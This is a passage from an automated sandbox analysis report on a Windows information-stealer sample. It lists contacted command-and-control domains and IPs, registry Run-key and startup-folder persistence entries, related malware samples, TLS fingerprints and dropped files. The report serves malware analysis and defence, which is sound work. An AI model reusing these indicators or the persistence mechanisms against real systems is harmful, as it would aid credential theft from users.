https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	RegAsm.exe, 00000003.00000002.3010666242.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2982048751.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
http://cowod.hopto.EBFCGI	RegAsm.exe, 00000003.00000002.2982048751.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	RegAsm.exe, 00000003.00000002.2982048751.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://www.google.com/recaptcha/	RegAsm.exe, 0000000D.00000002.2969814382.0000000001499000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://checkout.steampowered.com/	RegAsm.exe, 0000000D.00000002.2969814382.0000000001499000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	FHCGCA.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	RegAsm.exe, 00000003.00000002.3010666242.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2982048751.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2972454624.00000000014A6000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	RegAsm.exe, 00000003.00000002.3010666242.0000000001477000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3010666242.000000000146F000.00000004.00000020.00020000.00000000.sdmp, GIJEGD.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	RegAsm.exe, 00000003.00000002.3010666242.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2982048751.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	RegAsm.exe, 00000003.00000002.3010666242.0000000001477000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3010666242.000000000146F000.00000004.00000020.00020000.00000000.sdmp, GIJEGD.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	RegAsm.exe, 00000003.00000002.3010666242.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2982048751.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	RegAsm.exe, 00000003.00000002.3010666242.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2982048751.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2972454624.00000000014A6000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	file.exe, 66f4247d51812_lfdsjna[1].exe.3.dr, EBGDHJECFC.exe.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	RegAsm.exe, 00000003.00000002.3010666242.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2982048751.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/;	RegAsm.exe, 0000000D.00000002.2969814382.0000000001499000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.entrust.net/rpa0	file.exe, 66f4247d51812_lfdsjna[1].exe.3.dr, EBGDHJECFC.exe.3.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/about/	76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://5.75.211.162/vcruntime140.dllf:	RegAsm.exe, 00000003.00000002.3010666242.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/my/wishlist/	RegAsm.exe, 00000003.00000002.3010666242.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2982048751.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/x	RegAsm.exe, 00000003.00000002.3010666242.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.51.224	performenj.shop	United States	13335	CLOUDFLARENETUS	true
104.21.77.130	reinforcenh.shop	United States	13335	CLOUDFLARENETUS	true
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
172.67.132.32	gutterydhowi.shop	United States	13335	CLOUDFLARENETUS	true
147.45.44.104	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
104.21.58.182	drawzhotdog.shop	United States	13335	CLOUDFLARENETUS	true
45.132.206.251	cowod.hopto.org	Russian Federation	59731	LIFELINK-ASRU	true
188.114.97.3	fragnantbui.shop	European Union	13335	CLOUDFLARENETUS	true
188.114.96.3	stogeneratmns.shop	European Union	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
5.75.211.162	unknown	Germany	24940	HETZNER-ASDE	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1518570
Start date and time:	2024-09-25 20:48:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@24/1064@14/11
EGA Information:	Successful, ratio: 57.1%
HCA Information:	Successful, ratio: 99% Number of executed functions: 92 Number of non-executed functions: 213
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.20, 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target FDWDZ.exe, PID 2920 because it is empty
Execution Graph export aborted for target KKEBKJJDGH.exe, PID 3496 because it is empty
Execution Graph export aborted for target MFDBG.exe, PID 7060 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtFsControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
14:49:26	API Interceptor	2x Sleep call for process: RegAsm.exe modified
14:49:58	API Interceptor	1x Sleep call for process: KKEBKJJDGH.exe modified
14:49:59	API Interceptor	1107x Sleep call for process: MFDBG.exe modified
14:50:52	API Interceptor	2x Sleep call for process: WerFault.exe modified
20:50:02	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MFDBG_ccd2458d6ac54884ba6051fba5e93da0 C:\Users\user\AppData\Local\Temp\Malewmf\MFDBG.exe
20:50:13	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MFDBG_ccd2458d6ac54884ba6051fba5e93da0 C:\Users\user\AppData\Local\Temp\Malewmf\MFDBG.exe
20:50:25	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_2c69460b03e74cb398a3043b4ff42089.lnk
20:50:47	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_193d6cd2b52e4ce2a048e05f59911b31.lnk
20:51:14	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_600b5ff6fb0844dbbcb6ed6242f97a2d.lnk
20:51:30	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_452dd5f24f914ad38c6573d22f57f61e.lnk
20:51:46	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_1889f16736d24f6f8ce8c10d6eac5175.lnk
20:52:01	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_5ddea0c3521d4559b31528cc5726985a.lnk
20:52:17	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_08f5e8f8dd014c2296cb58eda96ba5f7.lnk
20:52:32	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_c8bccb0d269942fb9afda433003974a8.lnk
20:52:47	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_3949435efa8447f6907184877bbcc4cd.lnk
20:53:03	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_fdbd98f41b7e46c287dee5d53c37da35.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.51.224	HHXyi02DYl.exe	Get hash	malicious	LummaC	Browse
	bYQ9uTqLzz.exe	Get hash	malicious	LummaC	Browse
	HHXyi02DYl.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.Malware-gen.15701.20735.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, MicroClip	Browse
	SecuriteInfo.com.Win64.Evo-gen.13360.8133.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse
	009.ps1	Get hash	malicious	LummaC	Browse
	ir57.ps1	Get hash	malicious	LummaC	Browse
	ueu7.exe	Get hash	malicious	LummaC	Browse
	opqg.ps1	Get hash	malicious	LummaC	Browse
	Info.ps1	Get hash	malicious	LummaC	Browse
104.21.77.130	Notepad3_v6.23.203.2.exe	Get hash	malicious	Amadey, GO Backdoor	Browse	downloaddining3.com/h9fmdW7/index.php
	am.exe	Get hash	malicious	Amadey	Browse	downloaddining3.com/h9fmdW7/index.php
	am.exe	Get hash	malicious	Amadey	Browse	downloaddining3.com/h9fmdW7/index.php
104.26.12.205	SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gutterydhowi.shop	bYQ9uTqLzz.exe	Get hash	malicious	LummaC	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
	ACeTKO93e9.exe	Get hash	malicious	LummaC	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136
cowod.hopto.org	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
performenj.shop	HHXyi02DYl.exe	Get hash	malicious	LummaC	Browse	104.21.51.224
	bYQ9uTqLzz.exe	Get hash	malicious	LummaC	Browse	104.21.51.224
	HHXyi02DYl.exe	Get hash	malicious	Unknown	Browse	104.21.51.224
	SecuriteInfo.com.Win64.Malware-gen.15701.20735.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, MicroClip	Browse	104.21.51.224
	SecuriteInfo.com.Win64.Evo-gen.13360.8133.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.51.224
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.189.2
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.189.2
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.189.2
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.189.2
	Suselx1.exe	Get hash	malicious	LummaC	Browse	172.67.189.2
fragnantbui.shop	bYQ9uTqLzz.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	ACeTKO93e9.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://qrco.de/bfQgn5	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://1drv.ms/o/c/e6ccafb0b1aa23aa/ErAFgONHz7JMjKMGZiNY1B8BzX_hsp6NES_6N9-YPDqBow?e=ZhzETj	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://www.baidu.com/link?url=71TX_d4SSy_YcnMiSmK1k9U0hv2RvPANssrmsR9fCmhPc58TVaShxZVuVWaWCInt&wd=YWhvd2V8WlhWeWIzQmhhWFF1Ym1WMHxMalRQY2t0Uk90	Get hash	malicious	Unknown	Browse	104.18.10.207
	SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe	Get hash	malicious	Unknown	Browse	162.159.137.232
	https://cumonecumall.com/?tgaficro=aa6ca3230027edf772fbf6d355a8a93e4088a24800997b7b19a8eb4071188a24b1c94854a55c607abc04079f5ff46a3546a43c2ec2696476011777d6ea677911	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	https://merro-it.com/#bWljaGFlbF9zY2hydXRlQG91dGxvb2suY29t=	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
CLOUDFLARENETUS	https://qrco.de/bfQgn5	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://1drv.ms/o/c/e6ccafb0b1aa23aa/ErAFgONHz7JMjKMGZiNY1B8BzX_hsp6NES_6N9-YPDqBow?e=ZhzETj	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://www.baidu.com/link?url=71TX_d4SSy_YcnMiSmK1k9U0hv2RvPANssrmsR9fCmhPc58TVaShxZVuVWaWCInt&wd=YWhvd2V8WlhWeWIzQmhhWFF1Ym1WMHxMalRQY2t0Uk90	Get hash	malicious	Unknown	Browse	104.18.10.207
	SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe	Get hash	malicious	Unknown	Browse	162.159.137.232
	https://cumonecumall.com/?tgaficro=aa6ca3230027edf772fbf6d355a8a93e4088a24800997b7b19a8eb4071188a24b1c94854a55c607abc04079f5ff46a3546a43c2ec2696476011777d6ea677911	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	https://merro-it.com/#bWljaGFlbF9zY2hydXRlQG91dGxvb2suY29t=	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
CLOUDFLARENETUS	https://qrco.de/bfQgn5	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://1drv.ms/o/c/e6ccafb0b1aa23aa/ErAFgONHz7JMjKMGZiNY1B8BzX_hsp6NES_6N9-YPDqBow?e=ZhzETj	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://www.baidu.com/link?url=71TX_d4SSy_YcnMiSmK1k9U0hv2RvPANssrmsR9fCmhPc58TVaShxZVuVWaWCInt&wd=YWhvd2V8WlhWeWIzQmhhWFF1Ym1WMHxMalRQY2t0Uk90	Get hash	malicious	Unknown	Browse	104.18.10.207
	SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe	Get hash	malicious	Unknown	Browse	162.159.137.232
	https://cumonecumall.com/?tgaficro=aa6ca3230027edf772fbf6d355a8a93e4088a24800997b7b19a8eb4071188a24b1c94854a55c607abc04079f5ff46a3546a43c2ec2696476011777d6ea677911	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	https://merro-it.com/#bWljaGFlbF9zY2hydXRlQG91dGxvb2suY29t=	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
CLOUDFLARENETUS	https://qrco.de/bfQgn5	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://1drv.ms/o/c/e6ccafb0b1aa23aa/ErAFgONHz7JMjKMGZiNY1B8BzX_hsp6NES_6N9-YPDqBow?e=ZhzETj	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://www.baidu.com/link?url=71TX_d4SSy_YcnMiSmK1k9U0hv2RvPANssrmsR9fCmhPc58TVaShxZVuVWaWCInt&wd=YWhvd2V8WlhWeWIzQmhhWFF1Ym1WMHxMalRQY2t0Uk90	Get hash	malicious	Unknown	Browse	104.18.10.207
	SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe	Get hash	malicious	Unknown	Browse	162.159.137.232
	https://cumonecumall.com/?tgaficro=aa6ca3230027edf772fbf6d355a8a93e4088a24800997b7b19a8eb4071188a24b1c94854a55c607abc04079f5ff46a3546a43c2ec2696476011777d6ea677911	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	https://merro-it.com/#bWljaGFlbF9zY2hydXRlQG91dGxvb2suY29t=	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://1drv.ms/o/c/e6ccafb0b1aa23aa/ErAFgONHz7JMjKMGZiNY1B8BzX_hsp6NES_6N9-YPDqBow?e=ZhzETj	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	update.js	Get hash	malicious	NetSupport RAT	Browse	188.114.96.3
	LJ1IZDkHyE.hta	Get hash	malicious	Cobalt Strike, Remcos, PureLog Stealer	Browse	188.114.96.3
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Confirmaci#U00f3n de pago_shrunk.exe	Get hash	malicious	AgentTesla	Browse	188.114.96.3
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exe	Get hash	malicious	MicroClip	Browse	188.114.96.3
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
a0e9f5d64349fb13191bc781f81f42e1	HHXyi02DYl.exe	Get hash	malicious	LummaC	Browse	104.21.51.224 104.21.77.130 188.114.97.3 172.67.132.32 188.114.96.3 104.102.49.254 104.21.58.182
	bYQ9uTqLzz.exe	Get hash	malicious	LummaC	Browse	104.21.51.224 104.21.77.130 188.114.97.3 172.67.132.32 188.114.96.3 104.102.49.254 104.21.58.182
	LcDQjpdIiU.exe	Get hash	malicious	LummaC	Browse	104.21.51.224 104.21.77.130 188.114.97.3 172.67.132.32 188.114.96.3 104.102.49.254 104.21.58.182
	BLHvvl44N0.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.51.224 104.21.77.130 188.114.97.3 172.67.132.32 188.114.96.3 104.102.49.254 104.21.58.182
	7Ekgc5sWNB.exe	Get hash	malicious	LummaC	Browse	104.21.51.224 104.21.77.130 188.114.97.3 172.67.132.32 188.114.96.3 104.102.49.254 104.21.58.182
	HHXyi02DYl.exe	Get hash	malicious	Unknown	Browse	104.21.51.224 104.21.77.130 188.114.97.3 172.67.132.32 188.114.96.3 104.102.49.254 104.21.58.182
	LcDQjpdIiU.exe	Get hash	malicious	LummaC	Browse	104.21.51.224 104.21.77.130 188.114.97.3 172.67.132.32 188.114.96.3 104.102.49.254 104.21.58.182
	CKQBusSE9V.exe	Get hash	malicious	LummaC	Browse	104.21.51.224 104.21.77.130 188.114.97.3 172.67.132.32 188.114.96.3 104.102.49.254 104.21.58.182
	SecuriteInfo.com.Win64.Malware-gen.15701.20735.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, MicroClip	Browse	104.21.51.224 104.21.77.130 188.114.97.3 172.67.132.32 188.114.96.3 104.102.49.254 104.21.58.182
	SecuriteInfo.com.Win64.Evo-gen.13360.8133.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.51.224 104.21.77.130 188.114.97.3 172.67.132.32 188.114.96.3 104.102.49.254 104.21.58.182
37f463bf4616ecd445d4a1937da06e19	update.js	Get hash	malicious	NetSupport RAT	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	Zeskanowana lista przedmiot#U00f3w nr 84329.vbs	Get hash	malicious	FormBook, GuLoader	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	SDWLLRJcsY.exe	Get hash	malicious	Remcos, GuLoader	Browse	104.102.49.254
	D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.102.49.254
	cDErPwSuCB.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	tpq.ps1	Get hash	malicious	Unknown	Browse	104.102.49.254

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\EBGDHJECFC.exe	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
C:\ProgramData\KKEBKJJDGH.exe	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
